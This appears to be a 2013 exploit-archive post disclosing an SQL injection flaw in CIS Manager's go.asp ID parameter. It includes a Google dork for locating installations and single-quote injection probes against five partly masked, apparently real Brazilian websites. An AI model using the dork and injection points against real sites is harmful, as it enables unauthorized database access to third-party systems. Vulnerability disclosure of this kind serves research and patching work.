Home / exploitsPDF  

CIS Manager SQL Injection Vulnerabilites

Posted on 11 September 2013

#******************************************************************************** # Exploit Title : CIS Manager SQL Injection Vulnerabilites # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://www.construtiva.com.br # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by CIS Manager" # # Date: 2013/09/10 # -------------------------------------------------------------------- # Exploit : Sql Injection # # Location : [Target]/artigosnoticias/go.asp?ID=[Sql Injection] # # # Proof: # # http://www.agvXstica.com.br/artigosnoticias/go.asp?ID=' # # http://www.beaXr.com.br/artigosnoticias/go.asp?ID=' # # http://www.emprXppds.com.br/artigosnoticias/go.asp?ID=' # # http://www.fieldXger.com.br/artigosnoticias/go.asp?ID=' # # http://www.gecXel.com.br/artigosnoticias/go.asp?ID=' # ###################### discovered by : ACC3SS ######################

 

TOP